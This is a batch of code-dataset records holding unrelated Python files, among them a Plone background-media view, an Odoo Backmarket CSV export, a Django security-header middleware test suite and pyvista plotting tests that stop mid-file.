__init__(self,): \n\t\tself.name = \"TRUANT\"\n\t\tself.definitions = [u'Children who truant are regularly absent from school, usually while pretending to their parents that they have gone to school: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_truant.py","file_name":"_truant.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"226900742","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: /home/hvelarde/forcontent/idg/src/brasil.gov.portal/src/brasil/gov/portal/browser/helper.py\n# Compiled at: 2018-11-30 15:01:51\n__doc__ = 'Helper view to return a background image or video to be used in the\\nsite root when the expandable header is enabled.\\n'\nfrom __future__ import absolute_import\nfrom brasil.gov.portal.controlpanel.portal import ISettingsPortal\nfrom plone import api\nfrom plone.formwidget.namedfile.converter import b64decode_file\nfrom plone.namedfile.browser import Download\nfrom plone.namedfile.file import NamedFile\nimport hashlib\n\nclass BackgroundMediaView(Download):\n \"\"\"Helper view to return a background image or video to be used in\n the site root when the expandable header is enabled.\n \"\"\"\n\n def setup(self):\n name = ISettingsPortal.__identifier__ + '.background_image'\n background_image = api.portal.get_registry_record(name, default=None)\n if background_image is None:\n self.data = None\n return\n else:\n filename, data = b64decode_file(background_image)\n self.filename = filename\n self.data = NamedFile(data=data, filename=filename)\n self.checksum = hashlib.sha1(data).hexdigest()\n return\n\n def _getFile(self):\n return self.data\n\n def __call__(self):\n \"\"\"Render the background image or video.\n\n Make use of HTTP caching headers to decrease server usage:\n file is not cached on browsers and is cached 120 seconds on\n intermediate caches. We use a checksum of the image data as\n ETag to return a 304 (Not Modified) status in case the file\n has not changed since last time it was accessed.\n\n More information: https://httpwg.org/specs/rfc7234.html\n \"\"\"\n self.setup()\n if self.data is None:\n self.request.RESPONSE.setStatus(410)\n return ''\n else:\n self.request.RESPONSE.setHeader('Cache-Control', 'max-age=0, s-maxage=120')\n self.request.RESPONSE.setHeader('ETag', self.checksum)\n match = self.request.get_header('If-None-Match', '')\n if self.checksum == match:\n self.request.response.setStatus(304)\n return ''\n return super(BackgroundMediaView, self).__call__()","sub_path":"pycfiles/brasil.gov.portlets-1.0.tar/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"36642272","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nimport csv\nimport logging\n\nfrom datetime import datetime as dt\nfrom io import StringIO\n\nfrom odoo import models, _\n\n_logger = logging.getLogger(__name__)\n\nCSV_HEADER = 'backmarket_id sku state price quantity lang warranty_delay'.split(' ')\n\n\nclass ProductIntegration(models.Model):\n\n _inherit = 'edi.integration'\n\n def _get_out_synchronizations(self):\n \"\"\"\n \"\"\"\n\n integration = self.env.ref('edi_backmarket.backmarket_products_integration')\n if self == integration:\n\n # NOTE: Keep pricelist in context\n Product = self.env['product.product'].with_context(\n pricelist=self.env.ref('edi_backmarket.backmarket_pricelist').id\n )\n\n now = dt.utcnow().strftime('%s')\n\n products = Product.search([\n ('backmarket_sync', '=', True)\n ])\n if not products:\n _logger.info(_('No products configured to be synchronized with %s' % integration.name))\n return self.env['edi.synchronization']\n\n locations = self.env['stock.location'].search([\n ('backmarket_sync', '=', True)\n ])\n if not locations:\n _logger.info(_('No locations found to synchronize with %s' % integration.name))\n return self.env['edi.synchronization']\n\n output = StringIO()\n writer = csv.writer(output, delimiter=';')\n\n writer.writerow(CSV_HEADER)\n\n products_to_sync = Product\n product_qties = {}\n for p in products:\n\n stock_quant = self.env['stock.quant'].search([\n ('location_id', 'in', locations.ids),\n ('product_id', '=', p.id)\n ])\n qty = sum(stock_quant.mapped('quantity')) - sum(stock_quant.mapped('reserved_quantity'))\n\n if qty < 0:\n _logger.info(_('Product \\'%s: %s\\' skipped, unavailable') % (p.display_name, p.id))\n continue\n\n products_to_sync |= p\n product_qties[p.id] = qty\n\n if not products_to_sync:\n _logger.info(_('No products found to synchronize with %s' % integration.name))\n return self.env['edi.synchronization']\n\n for p in products_to_sync:\n row = [p.backmarket_id, p.default_code, p.backmarket_grade, '%.0f' % p.price, int(product_qties[p.id]), 'fr-fr', 6]\n writer.writerow(row)\n\n content = output.getvalue()\n\n self.env['edi.synchronization'].create({\n 'name': 'backmarket_%s.csv' % now,\n 'filename': 'Import_products_%s.csv' % now,\n 'integration_id': self.id,\n 'content': content\n })\n\n return super(ProductIntegration, self)._get_out_synchronizations()\n","sub_path":"edi_backmarket/models/edi_integration.py","file_name":"edi_integration.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"514373494","text":"# coding=utf-8\n\n# The root directory of the dataset file\ndataset_dir = '/Users/tomwang/Downloads/deep_learning/VOC/train/VOCdevkit/VOC2012'\n\n# The cache file to cache the middle data of the data-set\ncache_dir = '/Users/tomwang/Downloads/deep_learning/VOC/train/'\n\n# mini_batch size\nbatch_size = 32\n\n# image_size\nimage_size = 448\n\n# The number of grid cell\ncell_num = 7\n\n# class\nclz = ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable',\n 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor']\n\n\n","sub_path":"voc/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"460412","text":"\"\"\"\n该文件作为一个模板供module调用\n\"\"\"\n\n\n# 返回前n项斐波那契数列\ndef fib(n):\n a = 0\n b = 1\n result = []\n for i in range(n):\n result.append(b)\n num = a + b\n a = b\n b = num\n print(result)\n return result\n\n\n\"\"\"\n这种方式只会对该模块进行测试而不是在其他模块导入该模块时\n也执行测试语句\n\"\"\"\n# 测试模块\nif __name__ == \"__main__\":\n fib(6)\n","sub_path":"venv/Include/module_import.py","file_name":"module_import.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"231072118","text":"from django.conf import settings\nfrom django.http import HttpResponse\nfrom django.test.client import RequestFactory\n\nimport mock\nfrom nose.tools import eq_\n\nfrom commonware.response import middleware\n\n\ndef _make_resp(mw_cls, secure=False):\n mw = mw_cls()\n req = RequestFactory().get('/')\n if secure:\n req.is_secure = lambda: True\n resp = mw.process_response(req, HttpResponse())\n return resp\n\n\ndef test_sts_middleware():\n resp = _make_resp(middleware.StrictTransportMiddleware)\n assert 'strict-transport-security' not in resp\n resp = _make_resp(middleware.StrictTransportMiddleware, secure=True)\n assert 'strict-transport-security' in resp\n eq_('max-age=2592000', resp['strict-transport-security'])\n\n\n@mock.patch.object(settings._wrapped, 'STS_SUBDOMAINS', True)\ndef test_sts_middleware_subdomains():\n resp = _make_resp(middleware.StrictTransportMiddleware, secure=True)\n assert 'strict-transport-security' in resp\n assert resp['strict-transport-security'].endswith('includeSubDomains')\n\n\ndef test_xframe_middleware():\n resp = _make_resp(middleware.FrameOptionsHeader)\n assert 'x-frame-options' in resp\n eq_('DENY', resp['x-frame-options'])\n\n\ndef test_xframe_middleware_no_overwrite():\n mw = middleware.FrameOptionsHeader()\n resp = HttpResponse()\n resp['x-frame-options'] = 'SAMEORIGIN'\n resp = mw.process_response({}, resp)\n eq_('SAMEORIGIN', resp['x-frame-options'])\n\n\ndef test_xframe_middleware_disable():\n mw = middleware.FrameOptionsHeader()\n resp = HttpResponse()\n resp.no_frame_options = True\n resp = mw.process_response({}, resp)\n assert not 'x-frame-options' in resp\n","sub_path":"commonware/response/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"132362884","text":"#判断一个链表是否有环\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution(object):\n def hasCycle(self, head):\n dic = {}\n while head:\n if dic.get(head,False)==False:\n dic[head] = 1\n else:\n return True\n head = head.next\n return False\n\n\nl1 = ListNode(1)\nl2 = ListNode(2)\nl3 = ListNode(3)\nl4 = ListNode(4)\nl5 = ListNode(5)\nl6 = ListNode(6)\nl1.next = l2\nl2.next = l3\nl3.next = l4\nl4.next = l5\nl5.next = l6\nl6.next = l2\n\ns = Solution()\nprint(s.hasCycle(l1))","sub_path":"Python/141.Linked List Cycle.py","file_name":"141.Linked List Cycle.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"284461079","text":"from future.utils import viewitems\n\nimport csv\nimport collections\nimport itertools\nfrom sklearn import metrics\n\nexp = 'results_2/'\nmanual_clusters = exp + 'VAL_music20k_golden.csv'\ndedupe_clusters = exp + 'VAL_F-MWSP_music20k_output.csv'\nrow_id_name = 'TID'\n\ndef evaluateDuplicates(found_dupes, true_dupes):\n true_positives = found_dupes.intersection(true_dupes)\n false_positives = found_dupes.difference(true_dupes)\n uncovered_dupes = true_dupes.difference(found_dupes)\n\n print('found duplicate: %d' % len(found_dupes))\n\n precision = 1 - len(false_positives) / float(len(found_dupes))\n print('Precision: %0.3f' % precision)\n\n recall = len(true_positives) / float(len(true_dupes))\n print('Recall: %0.3f' % recall)\n\n F1 = 2 * precision * recall / (precision + recall)\n print('F1: %0.3f' % F1)\n\ndef evaluateMeasures(found_list, true_list):\n\n print(\"Homogeneity: %0.3f\" % metrics.homogeneity_score(true_list, found_list))\n print(\"Completeness: %0.3f\" % metrics.completeness_score(true_list, found_list))\n print(\"V-measure: %0.3f\" % metrics.v_measure_score(true_list, found_list))\n print(\"Adjusted Rand Index: %0.3f\"\n % metrics.adjusted_rand_score(true_list, found_list))\n print(\"Adjusted Mutual Information: %0.3f\"\n % metrics.adjusted_mutual_info_score(true_list, found_list))\n print(\"Fowlkes Mallows: %0.3f\" % metrics.fowlkes_mallows_score(true_list, found_list))\n \ndef dupePairs(filename, rowname, row_id_name) :\n dupe_d = collections.defaultdict(list)\n dupe_l = []\n\n with open(filename) as f:\n reader = csv.DictReader(f, delimiter=',', quotechar='\"')\n for row in reader:\n #print(row)\n dupe_d[row[rowname]].append(row[row_id_name])\n if row[rowname] != 'x':\n dupe_l.append(row[rowname])\n\n if 'x' in dupe_d :\n del dupe_d['x']\n\n dupe_s = set([])\n for (unique_id, cluster) in viewitems(dupe_d) :\n # print(unique_id, len(cluster), cluster)\n if len(cluster) > 1:\n #print(unique_id, len(cluster), cluster)\n for pair in itertools.combinations(cluster, 2):\n dupe_s.add(frozenset(pair))\n \n return dupe_s, dupe_l\n\nprint('WARNING! Check the row_id_name')\nprint(row_id_name)\n\nprint(dedupe_clusters)\n\ntrue_dupes, true_list = dupePairs(manual_clusters, 'True Id', row_id_name)\ntest_dupes, test_list = dupePairs(dedupe_clusters, 'Cluster ID', row_id_name)\n\n#print('test_dupes')\n#print(test_dupes)\nprint(len(true_list))\nprint(len(test_list))\nassert(len(true_list) == len(test_list))\n\nevaluateDuplicates(test_dupes, true_dupes)\nevaluateMeasures(test_list, true_list)\n\n\n","sub_path":"code/music20k/evaluation_old.py","file_name":"evaluation_old.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"360011376","text":"import os\nimport sys\nfrom weakref import proxy\n\nimport imageio\nimport numpy as np\nimport pytest\n\nimport pyvista\nfrom pyvista import examples\nfrom pyvista.plotting import system_supports_plotting\n\nNO_PLOTTING = not system_supports_plotting()\n\nffmpeg_failed = False\ntry:\n try:\n import imageio_ffmpeg\n imageio_ffmpeg.get_ffmpeg_exe()\n except ImportError:\n imageio.plugins.ffmpeg.download()\nexcept:\n ffmpeg_failed = True\n\n\nif __name__ != '__main__':\n OFF_SCREEN = 'pytest' in sys.modules\nelse:\n OFF_SCREEN = False\n\npyvista.OFF_SCREEN = OFF_SCREEN\n\n\nsphere = pyvista.Sphere()\nsphere_b = pyvista.Sphere(1.0)\nsphere_c = pyvista.Sphere(2.0)\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot(tmpdir):\n filename = os.path.join(pyvista.USER_DATA_PATH, 'tmp.png')\n scalars = np.arange(sphere.n_points)\n cpos, img = pyvista.plot(sphere,\n off_screen=OFF_SCREEN,\n full_screen=True,\n text='this is a sphere',\n show_bounds=True,\n color='r',\n style='wireframe',\n line_width=10,\n scalars=scalars,\n flip_scalars=True,\n cmap='bwr',\n interpolate_before_map=True,\n screenshot=filename,\n return_img=True)\n assert isinstance(cpos, pyvista.CameraPosition)\n assert isinstance(img, np.ndarray)\n assert os.path.isfile(filename)\n os.remove(filename)\n filename = os.path.join(pyvista.USER_DATA_PATH, 'foo')\n cpos = pyvista.plot(sphere, off_screen=OFF_SCREEN, screenshot=filename)\n filename = filename + \".png\" # Ensure it added a PNG extension by default\n assert os.path.isfile(filename)\n # remove file\n os.remove(filename)\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_invalid_style():\n with pytest.raises(Exception):\n pyvista.plot(sphere, style='not a style')\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_bounds_axes_with_no_data():\n plotter = pyvista.Plotter()\n plotter.show_bounds()\n plotter.close()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_show_grid():\n plotter = pyvista.Plotter()\n plotter.show_grid()\n plotter.add_mesh(sphere)\n plotter.close()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_set_camera_position():\n # with pytest.raises(Exception):\n cpos = [(2.085387555594636, 5.259683527170288, 13.092943022481887),\n (0.0, 0.0, 0.0),\n (-0.7611973344707588, -0.5507178512374836, 0.3424740374436883)]\n\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n plotter.camera_position = 'xy'\n plotter.camera_position = 'xz'\n plotter.camera_position = 'yz'\n plotter.camera_position = 'yx'\n plotter.camera_position = 'zx'\n plotter.camera_position = 'zy'\n plotter.camera_position = cpos\n cpos_out = plotter.show()\n assert cpos_out == cpos\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_no_active_scalars():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n with pytest.raises(Exception):\n plotter.update_scalars(np.arange(5))\n with pytest.raises(Exception):\n plotter.update_scalars(np.arange(sphere.n_faces))\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_show_bounds():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n plotter.show_bounds(show_xaxis=False,\n show_yaxis=False,\n show_zaxis=False,\n show_xlabels=False,\n show_ylabels=False,\n show_zlabels=False,\n use_2d=True)\n # And test backwards compatibility\n plotter.add_bounds_axes(show_xaxis=False,\n show_yaxis=False,\n show_zaxis=False,\n show_xlabels=False,\n show_ylabels=False,\n show_zlabels=False,\n use_2d=True)\n plotter.show()\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_label_fmt():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n plotter.show_bounds(xlabel='My X', fmt=r'%.3f')\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\n@pytest.mark.parametrize('grid', [True, 'both', 'front', 'back'])\n@pytest.mark.parametrize('location', ['all', 'origin', 'outer', 'front', 'back'])\ndef test_plot_show_bounds_params(grid, location):\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(pyvista.Cube())\n plotter.show_bounds(grid=grid, ticks='inside', location=location)\n plotter.show_bounds(grid=grid, ticks='outside', location=location)\n plotter.show_bounds(grid=grid, ticks='both', location=location)\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plotter_scale():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n plotter.set_scale(10, 10, 10)\n assert plotter.scale == [10, 10, 10]\n plotter.set_scale(5.0)\n plotter.set_scale(yscale=6.0)\n plotter.set_scale(zscale=9.0)\n assert plotter.scale == [5.0, 6.0, 9.0]\n plotter.scale = [1.0, 4.0, 2.0]\n assert plotter.scale == [1.0, 4.0, 2.0]\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_add_scalar_bar():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n plotter.add_scalar_bar(label_font_size=10, title_font_size=20, title='woa',\n interactive=True, vertical=True)\n plotter.add_scalar_bar(background_color='white', n_colors=256)\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_invalid_add_scalar_bar():\n with pytest.raises(Exception):\n plotter = pyvista.Plotter()\n plotter.add_scalar_bar()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_list():\n pyvista.plot([sphere, sphere_b],\n off_screen=OFF_SCREEN,\n style='points')\n\n pyvista.plot([sphere, sphere_b, sphere_c],\n off_screen=OFF_SCREEN,\n style='wireframe')\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_add_lines_invalid():\n plotter = pyvista.Plotter()\n with pytest.raises(Exception):\n plotter.add_lines(range(10))\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_open_gif_invalid():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n with pytest.raises(Exception):\n plotter.open_gif('file.abs')\n\n\n@pytest.mark.skipif(ffmpeg_failed, reason=\"Requires imageio-ffmpeg\")\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_make_movie():\n # Make temporary file\n filename = os.path.join(pyvista.USER_DATA_PATH, 'tmp.mp4')\n\n movie_sphere = sphere.copy()\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.open_movie(filename)\n actor = plotter.add_axes_at_origin()\n plotter.remove_actor(actor)\n plotter.add_mesh(movie_sphere,\n scalars=np.random.random(movie_sphere.n_faces))\n plotter.show(auto_close=False, window_size=[304, 304])\n plotter.set_focus([0, 0, 0])\n for i in range(10):\n plotter.write_frame()\n random_points = np.random.random(movie_sphere.points.shape)\n movie_sphere.points = random_points*0.01 + movie_sphere.points*0.99\n movie_sphere.points -= movie_sphere.points.mean(0)\n scalars = np.random.random(movie_sphere.n_faces)\n plotter.update_scalars(scalars)\n\n # checking if plotter closes\n ref = proxy(plotter)\n plotter.close()\n\n # remove file\n os.remove(filename)\n\n try:\n ref\n except:\n raise Exception('Plotter did not close')\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_add_legend():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n with pytest.raises(Exception):\n plotter.add_legend()\n legend_labels = [['sphere', 'r']]\n plotter.add_legend(labels=legend_labels, border=True, bcolor=None,\n size=[0.1, 0.1])\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_add_axes_twice():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_axes()\n plotter.add_axes(interactive=True)\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_add_point_labels():\n n = 10\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n points = np.random.random((n, 3))\n\n with pytest.raises(Exception):\n plotter.add_point_labels(points, range(n - 1))\n\n plotter.add_point_labels(points, range(n), show_points=True, point_color='r')\n plotter.add_point_labels(points - 1, range(n), show_points=False, point_color='r')\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_set_background():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.set_background('k')\n plotter.set_background([0, 0, 0], top=[1,1,1]) # Gradient\n plotter.show()\n\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN, shape=(1,2))\n plotter.set_background('orange')\n for renderer in plotter.renderers:\n assert renderer.GetBackground() == pyvista.parse_color('orange')\n plotter.show()\n\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN, shape=(1,2))\n plotter.subplot(0,1)\n plotter.set_background('orange', all_renderers=False)\n assert plotter.renderers[0].GetBackground() != pyvista.parse_color('orange')\n assert plotter.renderers[1].GetBackground() == pyvista.parse_color('orange')\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_add_points():\n n = 10\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n points = np.random.random((n, 3))\n plotter.add_points(points, scalars=np.arange(10), cmap=None, flip_scalars=True)\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_key_press_event():\n plotter = pyvista.Plotter(off_screen=False)\n plotter.key_press_event(None, None)\n plotter.close()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_left_button_down():\n plotter = pyvista.Plotter(off_screen=False)\n plotter.left_button_down(None, None)\n # assert np.allclose(plotter.pickpoint, [0, 0, 0])\\\n plotter.close()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_show_axes():\n # if not closed correctly, a seg fault occurs when exitting\n plotter = pyvista.Plotter(off_screen=False)\n plotter.show_axes()\n plotter.close()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_update():\n plotter = pyvista.Plotter(off_screen=True)\n plotter.update()\n plotter.close()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_cell_arrays():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n scalars = np.arange(sphere.n_faces)\n plotter.add_mesh(sphere, interpolate_before_map=True, scalars=scalars,\n n_colors=5, rng=10)\n plotter.show()\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_clim():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n scalars = np.arange(sphere.n_faces)\n plotter.add_mesh(sphere, interpolate_before_map=True, scalars=scalars,\n n_colors=5, clim=10)\n plotter.show()\n assert plotter.mapper.GetScalarRange() == (-10, 10)\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_invalid_n_arrays():\n with pytest.raises(Exception):\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere, scalars=np.arange(10))\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_arrow():\n cent = np.random.random(3)\n direction = np.random.random(3)\n cpos, img = pyvista.plot_arrows(cent, direction, off_screen=True, screenshot=True)\n assert np.any(img)\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_arrows():\n cent = np.random.random((100, 3))\n direction = np.random.random((100, 3))\n cpos, img = pyvista.plot_arrows(cent, direction, off_screen=True, screenshot=True)\n assert np.any(img)\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_axes():\n plotter = pyvista.Plotter(off_screen=True)\n plotter.add_axes()\n plotter.add_mesh(pyvista.Sphere())\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_box_axes():\n plotter = pyvista.Plotter(off_screen=True)\n plotter.add_axes(box=True, box_args={'color_box':True})\n plotter.add_mesh(pyvista.Sphere())\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_screenshot(tmpdir):\n plotter = pyvista.Plotter(off_screen=True)\n plotter.add_mesh(pyvista.Sphere())\n img = plotter.screenshot(transparent_background=True)\n assert np.any(img)\n img_again = plotter.screenshot()\n assert np.any(img_again)\n filename = str(tmpdir.mkdir(\"tmpdir\").join('export-graphic.svg'))\n plotter.save_graphic(filename)\n\n # checking if plotter closes\n ref = proxy(plotter)\n plotter.close()\n\n try:\n ref\n except:\n raise Exception('Plotter did not close')\n\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_scalars_by_name():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n data = examples.load_uniform()\n plotter.add_mesh(data, scalars='Spatial Cell Data')\n plotter.show()\n\n\ndef test_themes():\n pyvista.set_plot_theme('paraview')\n pyvista.set_plot_theme('document')\n pyvista.set_plot_theme('night')\n pyvista.set_plot_theme('default')\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_multi_block_plot():\n multi = pyvista.MultiBlock()\n multi.append(examples.load_rectilinear())\n uni = examples.load_uniform()\n arr = np.random.rand(uni.n_cells)\n uni._add_cell_array(arr, 'Random Data')\n multi.append(uni)\n # And now add a data set without the desired array and a NULL component\n multi[3] = examples.load_airplane()\n multi.plot(scalars='Random Data', off_screen=OFF_SCREEN, multi_colors=True)\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_clear():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n plotter.clear()\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_texture():\n \"\"\"\"Test adding a texture to a plot\"\"\"\n globe = examples.load_globe()\n texture = examples.load_globe_texture()\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(globe, texture=texture)\n plotter.show()\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_texture_associated():\n \"\"\"\"Test adding a texture to a plot\"\"\"\n globe = examples.load_globe()\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(globe, texture=True)\n plotter.show()\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_read_texture_from_numpy():\n \"\"\"\"Test adding a texture to a plot\"\"\"\n globe = examples.load_globe()\n texture = pyvista.numpy_to_texture(imageio.imread(examples.mapfile))\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(globe, texture=texture)\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_rgb():\n \"\"\"\"Test adding a texture to a plot\"\"\"\n cube = pyvista.Cube()\n cube.clear_arrays()\n x_face_color = (255, 0, 0)\n y_face_color = (0, 255, 0)\n z_face_color = (0, 0, 255)\n face_colors = np.array([x_face_color,\n x_face_color,\n y_face_color,\n y_face_color,\n z_face_color,\n z_face_color,\n ], dtype=np.uint8)\n cube.cell_arrays['face_colors'] = face_colors\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(cube, scalars='face_colors', rgb=True)\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_plot_multi_component_array():\n \"\"\"\"Test adding a texture to a plot\"\"\"\n image = pyvista.UniformGrid((3,3,3))\n image['array'] = np.random.randn(*image.dimensions).ravel(order='f')\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(image, scalars='array')\n plotter.show()\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_camera():\n plotter = pyvista.Plotter(off_screen=OFF_SCREEN)\n plotter.add_mesh(sphere)\n plotter.view_isometric()\n plotter.reset_camera()\n plotter.view_xy()\n plotter.view_xz()\n plotter.view_yz()\n plotter.add_mesh(examples.load_uniform(), reset_camera=True, culling=True)\n plotter.view_xy(True)\n plotter.view_xz(True)\n plotter.view_yz(True)\n plotter.show()\n plotter.camera_position = None\n\n\n@pytest.mark.skipif(NO_PLOTTING, reason=\"Requires system to support plotting\")\ndef test_multi_renderers():\n plotter = pyvista.Plotter(shape=(2, 2), off_screen=OFF_SCREEN)\n\n plotter.subplot(0, 0)\n plotter.add_text('Render Window 0', font_size=30)\n sphere = pyvista.Sphere()\n plotter.add_mesh(sphere, scalars=sphere.points[:, 2])\n plotter.add_scalar_bar('Z', vertical=True)\n\n plotter.subplot(0, 1)\n plotter.add_text('Render Window 1', font_size=30)\n plotter.add_mesh(pyvista.Cube(), show_edges=True)\n\n plotter.subplot(1, 0)\n plotter.add_text('Render Window 2', font_size=30)\n plotter.add_mesh(pyvista.Arrow(), color='y', show_edges=True)\n\n plotter.subplot(1, 1)\n plotter.add_text('Render Window 3', position=(0., 0.),\n 